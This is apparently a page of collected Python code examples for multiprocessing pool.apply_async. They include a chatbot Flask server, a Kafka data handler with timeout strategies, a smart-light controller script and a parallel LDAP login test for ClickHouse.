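    return (chain_id, step)


def make_callback(chain_id, step):
    # stand-in for __execute_callback: queue the next iteration of this chain
    def callback(result):
        done.append(result)
        if step + 1 < STEPS:
            pool.apply_async(handle_one, (chain_id, step + 1),
                             callback=make_callback(chain_id, step + 1))
    return callback


if __name__ == "__main__":
    for chain_id in range(CHAINS):
        pool.apply_async(handle_one, (chain_id, 0),
                         callback=make_callback(chain_id, 0))
    while len(done) < CHAINS * STEPS:  # crude exit test, like the engine's counters
        time.sleep(0.05)
    pool.close()
    pool.join()
    print("processed %d units of work" % len(done))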
Example #56
0
        )
        training = True

    print("I'm gonna be " + ("training!" if training else "chatting"))
    mode = 0
    if not training:
        mode = getIntInput("Mode: ",
                           [0, 1, 2]) if modeArg is None else int(modeArg)

    tf.reset_default_graph()

    bot = Bot(training)

    if not training:
        pool = Pool(processes=2)
        pool.apply_async(bot.startNet)

        if mode == 2:
            from flask import Flask, jsonify, request
            app = Flask(__name__)

            @app.route("/predict", methods=["POST", "GET"])
            def getAnswer():
                print(request.form)
                response = bot.predict(str(request.form.get("message")))
                return jsonify(response)

            app.run(host="0.0.0.0", port=8213)

        else:
            bot.startChat(mode)
Example #57
0
    def _handle_data_message(self, data_list, config):
        '''
        Handle the message data with the user's function, using the configured execution strategy.
        :param data_list{list}: the message data from kafka
        :param config{map}: the service configuration
        :return: a list of maps describing how each item in data_list was handled
        '''

        self.logger.info("Begin handling data_list with config")
        self.logger.info("Entering the user's function")
        config_list = [config for n in range(len(data_list))]
        # available strategies: "eventlet | thread | process"
        # if a per-item handler exists, apply the strategy to each item;
        # otherwise fall back to the batch handler for the whole data set
        # if self.strategy and self.time_out and self.pool_size:
        #     self.logger.info(str(self.strategy)+"  "+str(self.pool_size)+"   "+str(self.time_out))

        result_list = []

        # build the per-item result entries that will be passed to the handler
        for item in data_list:
            temp_map = {"input": item, "output": None, "error_info": None}
            result_list.append(temp_map)

        # when no execution strategy is set, looping over single items still needs a time limit,
        # and calling the user's batch handler needs one as well;
        # raise an error when the timeout signal is received
        def handler(signum, frame):
            raise AssertionError

        # data_list and config_list are the two argument lists;
        # for per-item control, each coroutine/thread/process in the pool is given
        # a limited time to return a result before it is treated as timed out

        try:
            start_time = time.time()
            if self._handle_input_item == None:
                try:
                    signal.signal(signal.SIGALRM, handler)
                    signal.alarm(self.mult_time_out)
                    result_list = self._handle_input_items(result_list, config)
                    signal.alarm(0)
                except AssertionError:
                    for item in result_list:
                        item["error_info"] = "time_out"

            elif self.strategy == "eventlet":
                # handle the input data with a coroutine pool
                # asyncio uvloop
                loop = asyncio.get_event_loop()
                tasks = []
                for item in result_list:
                    coroutine = self._handle_input_item(item, config)
                    c_to_feature = asyncio.ensure_future(coroutine)
                    tasks.append(c_to_feature)
                loop.run_until_complete(
                    asyncio.wait(tasks,
                                 timeout=self.time_out * len(data_list)))

                temp_result_list = []

                for i in range(0, len(tasks)):
                    try:
                        temp_result = tasks[i].result()
                        temp_result_list.append(temp_result)
                    except asyncio.InvalidStateError:
                        single_result = {
                            "input": data_list[i],
                            "output": None,
                            "error_info": "time_out"
                        }
                        temp_result_list.append(single_result)
                result_list = temp_result_list

            elif self.strategy == "thread":
                # bind the config argument once
                part_func = partial(self._handle_input_item, config=config)
                # handle the input data with a thread pool
                pool = ThreadPool(self.pool_size)

                results = []

                for item in result_list:
                    result = pool.apply_async(part_func, args=(item, ))
                    results.append(result)

                temp_result_list = []

                for i in range(0, len(results)):
                    try:
                        res = results[i].get(timeout=self.time_out)
                        temp_result_list.append(res)
                    except multiprocessing.TimeoutError:
                        single_result = {
                            "input": data_list[i],
                            "output": None,
                            "error_info": "time_out"
                        }
                        temp_result_list.append(single_result)

                result_list = temp_result_list

                pool.close()
                pool.join()
            else:
                self.logger.info("No strategy")
                temp_result_list = []
                for i in range(0, len(result_list)):
                    try:
                        signal.signal(signal.SIGALRM, handler)
                        signal.alarm(self.time_out)
                        single_result = self._handle_input_item(
                            result_list[i], config)
                        temp_result_list.append(single_result)
                        signal.alarm(0)
                    except AssertionError:
                        single_result = {
                            "input": data_list[i],
                            "output": None,
                            "error_info": 'time_out'
                        }
                        temp_result_list.append(single_result)
                result_list = temp_result_list

            end_time = time.time()

            self.logger.info("Time cost: " + str(end_time - start_time) + "s")
            self.logger.info("The result after handling:")
            self.logger.info(result_list)

            return result_list

        except Exception:
            self.logger.error(
                "Something wrong happened while handling the data_list:  " +
                traceback.format_exc())
            raise
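
The "thread" strategy above amounts to submitting every item with apply_async and then calling get() on each result with a timeout; a self-contained sketch of that per-item timeout handling, with a stand-in handler:

import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import time


def handle_item(item):
    # stand-in for the user's per-item handler
    time.sleep(item["delay"])
    return {"input": item, "output": item["delay"] * 2, "error_info": None}


if __name__ == "__main__":
    items = [{"delay": 0.1}, {"delay": 0.2}, {"delay": 2.0}]
    pool = ThreadPool(2)
    async_results = [pool.apply_async(handle_item, args=(item, )) for item in items]

    results = []
    for item, res in zip(items, async_results):
        try:
            results.append(res.get(timeout=0.5))  # per-item timeout
        except multiprocessing.TimeoutError:
            results.append({"input": item, "output": None, "error_info": "time_out"})

    pool.close()
    pool.join()
    print(results)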
Example #58
0
from multiprocessing.dummy import Pool
import os
import random
import time
def long_time_task(name):
    print('Run task %s(%s)...'%(name,os.getpid()))
    start=time.time()
    time.sleep(random.random()*3)
    end=time.time()
    print('Task %s runs %0.2f seconds'%(name,(end-start)))
if __name__ == '__main__':
    print('Parent process %s' % os.getpid())
    p = Pool(4)
    for i in range(5):
        # pass the function and its arguments; calling long_time_task(i) here would
        # run it synchronously and hand apply_async its return value instead
        p.apply_async(long_time_task, args=(i,))
    print('waiting for all tasks to finish...')
    p.close()
    p.join()
    print('all tasks done')
Example #59
0
        data = data_for_logical_load(llid, plum_dict)
    except:
        print(
            "Error finding the data for this logical load. Either the logical load ID is invalid or this switch wasn't detected on your network. Reinitialize the database using --init"
        )
        continue

    headers = {
        'User-Agent': 'Plum/2.3.0 (iPhone; iOS 9.2.1; Scale/2.00)',
        'X-Plum-House-Access-Token': data["token"]
    }

    if args.on:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": 255,
                              "llid": llid
                          }, headers))

    if args.off:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": 0,
                              "llid": llid
                          }, headers))
    if args.dim >= 0:
        pool.apply_async(plum_command,
                         ("https://%s:%s/v2/setLogicalLoadLevel" %
                          (data["ip"], data["port"]), {
                              "level": args.dim,
                              "llid": llid
                          }, headers))
Example #60
0
def parallel_login(self, server, user_count=10, timeout=200, rbac=False):
    """Check that login of valid and invalid LDAP authenticated users works in parallel.
    """
    self.context.ldap_node = self.context.cluster.node(server)
    user = None

    users = [{
        "cn": f"parallel_user{i}",
        "userpassword": randomword(20)
    } for i in range(user_count)]

    with ldap_users(*users):
        with ldap_authenticated_users(*[{
                "username": user["cn"],
                "server": server
        } for user in users],
                                      rbac=rbac):

            def login_with_valid_username_and_password(users,
                                                       i,
                                                       iterations=10):
                with When(f"valid users try to login #{i}"):
                    for i in range(iterations):
                        random_user = users[random.randint(0, len(users) - 1)]
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=random_user["userpassword"],
                            steps=False)

            def login_with_valid_username_and_invalid_password(
                    users, i, iterations=10):
                with When(
                        f"users try to login with valid username and invalid password #{i}"
                ):
                    for i in range(iterations):
                        random_user = users[random.randint(0, len(users) - 1)]
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=(random_user["userpassword"] +
                                      randomword(1)),
                            exitcode=4,
                            message=
                            f"DB::Exception: {random_user['cn']}: Authentication failed: password is incorrect or there is no user with such name",
                            steps=False)

            def login_with_invalid_username_and_valid_password(
                    users, i, iterations=10):
                with When(
                        f"users try to login with invalid username and valid password #{i}"
                ):
                    for i in range(iterations):
                        random_user = dict(users[random.randint(
                            0,
                            len(users) - 1)])
                        random_user["cn"] += randomword(1)
                        login_and_execute_query(
                            username=random_user["cn"],
                            password=random_user["userpassword"],
                            exitcode=4,
                            message=
                            f"DB::Exception: {random_user['cn']}: Authentication failed: password is incorrect or there is no user with such name",
                            steps=False)

            with When("I login in parallel"):
                p = Pool(15)
                tasks = []
                for i in range(5):
                    tasks.append(
                        p.apply_async(login_with_valid_username_and_password, (
                            users,
                            i,
                            50,
                        )))
                    tasks.append(
                        p.apply_async(
                            login_with_valid_username_and_invalid_password, (
                                users,
                                i,
                                50,
                            )))
                    tasks.append(
                        p.apply_async(
                            login_with_invalid_username_and_valid_password, (
                                users,
                                i,
                                50,
                            )))

            with Then("it should work"):
                for task in tasks:
                    task.get(timeout=timeout)